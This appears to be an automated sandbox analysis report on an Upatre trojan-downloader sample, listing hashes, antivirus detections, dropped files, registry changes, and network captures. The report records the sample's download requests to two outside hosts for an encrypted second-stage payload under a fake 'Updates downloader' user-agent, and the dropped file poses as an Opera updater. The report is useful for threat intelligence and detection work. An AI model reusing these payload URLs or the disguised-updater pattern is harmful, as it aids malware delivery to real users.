Analysis Date2014-11-04 07:24:11
MD5a305563faf7e91daeb6006bbedc923dc
SHA170e6e69a4e7e6ba5f5f79a6c512af3b98a8830b5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1cfe640fb916f9e71e2f42ce9463b6e6 sha1: d3cefe831eba88d17380b6e877f968ab01e72878 size: 6144
Section.rdata md5: 5991a0937ea1c73a6ea7d2b50760dccf sha1: b09ba9081a37296905432830e2b7a3f680249f52 size: 1536
Section.data md5: 36f425ac30a34478057dae27a1407f15 sha1: 27c149c9c2f3499e5e8e775de3eeba3e88845640 size: 512
Section.rsrc md5: d312230fc901e21ad5d01f3359ba6e14 sha1: 9a3ea68fc338ca5068121b66142c23539c4c2819 size: 10240
Section.reloc md5: 5941791c6b31ac52e41a5ea0912259d3 sha1: 953eb4ea14eb81b605c22a5b1c6a2a709e64de33 size: 512
Timestamp2014-02-05 03:55:00
PEhashb6248038e0af3e67a33a86bcc7288619ab5ee56f
IMPhash7772dfa3e3a72b92db47c13e7be36e20
AV360 SafeTrojan.GenericKD.1559549
AVAd-AwareTrojan.GenericKD.1559549
AVAlwil (avast)Zbot-TCT [Trj]
AVArcabit (arcavir)Trojan.Downloader.Agent.dtfw
AVAuthentiumW32/Trojan.QXZZ-7823
AVAvira (antivir)TR/Yarwi.B.176
AVBullGuardTrojan.GenericKD.1559549
AVCA (E-Trust Ino)Win32/Tnega.GXNWZHB
AVCAT (quickheal)TrojanDownloader.Upatre.A4
AVClamAVWin.Trojan.Generickd-68
AVDr. WebTrojan.DownLoad3.28161
AVEmsisoftTrojan.GenericKD.1559549
AVEset (nod32)Win32/TrojanDownloader.Waski.A
AVFortinetW32/Waski.AC!tr
AVFrisk (f-prot)W32/Trojan3.HKY
AVF-SecureTrojan.GenericKD.1559549
AVGrisoft (avg)Generic35.BQYO
AVIkarusTrojan-Downloader.Win32.Upatre
AVK7Trojan ( 0040f71e1 )
AVKasperskyTrojan-Downloader.Win32.Injecter.jiq
AVMalwareBytesTrojan.Downloader.Upatre
AVMcafeeDownloader-FSH!A305563FAF7E
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre.L
AVMicroWorld (escan)Trojan.GenericKD.1559549
AVNormanTrojan.GenericKD.1559549
AVRisingno_virus
AVSophosTroj/Upatre-S
AVSymantecDownloader.Upatre
AVTrend MicroTROJ_UPATRE.TZE
AVVirusBlokAda (vba32)TrojanDownloader.Injecter

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbsitacademy.com
Winsock DNSwahidexpress.com

Network Details:

DNSbsitacademy.com
Type: A
107.150.48.43
DNSwahidexpress.com
Type: A
103.15.74.65
HTTP GEThttp://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
Flows TCP192.168.1.1:1031 ➝ 107.150.48.43:80
Flows TCP192.168.1.1:1032 ➝ 103.15.74.65:80
Flows TCP192.168.1.1:1033 ➝ 107.150.48.43:80
Flows TCP192.168.1.1:1034 ➝ 103.15.74.65:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..


Strings
l
\1.scr
C:\0ySzT4aT.exe
C:\0yXoJdS1.exe
C:\1f04c58cd64f1d992946720933171aa86f1f15c1c57d0d66f7a3dfd0d1cf617c
C:\1H6_lcAf.exe
C:\1XVNiGRb.exe
C:\38116e45cf11c9def2c37fa30e06bc018e46cd9bf891a785b5ba6a5923323d5d
C:\487b40f83626767b4ac5984e18d98f99fb4a29a855746e349fe73a0c83ec2ca3
C:\4OAw6dNj.exe
C:\4vHknKs7.exe
C:\8iD2xfe3.exe
C:\94clNag9.exe
C:\9R9GxndA.exe
C:\9Z3DNRt6.exe
C:\a34bkNIn.exe
C:\A94aUTod.exe
C:\aIUbH0QM.exe
C:\AOYSy6MC.exe
C:\bKje2IhZ.exe
C:\d7143680a75410278c9b95484bc00b271fcf34c23bd0de80aeec3cea7d6cedbc
C:\D7QkO4t7.exe
C:\Documents and Settings\Administrator\
C:\hcF7eCU6.exe
C:\hG3OL4IM.exe
C:\j2mY72oN.exe
C:\Jk2nLpP3.exe
C:\jUWj7TOq.exe
C:\kYD8fnKP.exe
C:\LiAKcAF0.exe
C:\LioP7mJk.exe
C:\mMu0FlJa.exe
C:\N6oieXD9.exe
C:\n7URlBKs.exe
C:\pFwvJXru.exe
C:\q7VSfGFe.exe
C:\qFCCRxHi.exe
C:\qgX_3bi5.exe
C:\qYxqpebq.exe
C:\rrrNORCR.exe
C:\tDiWugjj.exe
C:\TMtk4JD7.exe
C:\UowVcj_v.exe
C:\uxk8IO6h.exe
C:\Vh70EiAi.exe
C:\vP2nEv_R.exe
C:\w5V0zrq2.exe
C:\Wo_R3fMU.exe
C:\xfqsWlNO.exe
C:\xPNihfHa.exe
C:\XPO1cNIb.exe
C:\YPkfVKVq.exe
C:\Ywr6ilYL.exe
C:\zm1Dwebw.exe
:	;);4;
4%5*5N5U5\5c5i5q5w5~5
5%6I6Y6y6
7%7*7/7?7J7X7^7
7D9Y9^9h9n9w9
absent
_acmdln
_adjust_fdiv
Africa
AhAuhh
AWVAf9
Bagdad
BeginPaint
button
COMCTL32.dll
_controlfp
CreateFileA
CreateWindowExA
:D,*~aB?
@.data
DefWindowProcA
DispatchMessageA
DragQueryFileA
EndPaint
_except_handler3
GDI32.dll
__getmainargs
GetMessageA
GetModuleHandleA
GetStartupInfoA
;H7-G@
hAAhAA
InitCommonControlsEx
_initterm
iRichu
k{.cee
KERNEL32.dll
KXG[O_
lantie
MSVCRT.dll
 ';(&NK:&]9
o7U"o7U"
__p__commode
__p__fmode
PostQuitMessage
PuZN=0
`.rdata
RegisterClassA
@.reloc
SendMessageA
__set_app_type
__setusermatherr
SHELL32.dll
ShowWindow
solienty
static
TextOutA
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateMessage
uAhhAhA
USER32.dll
_XcptFilter
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>(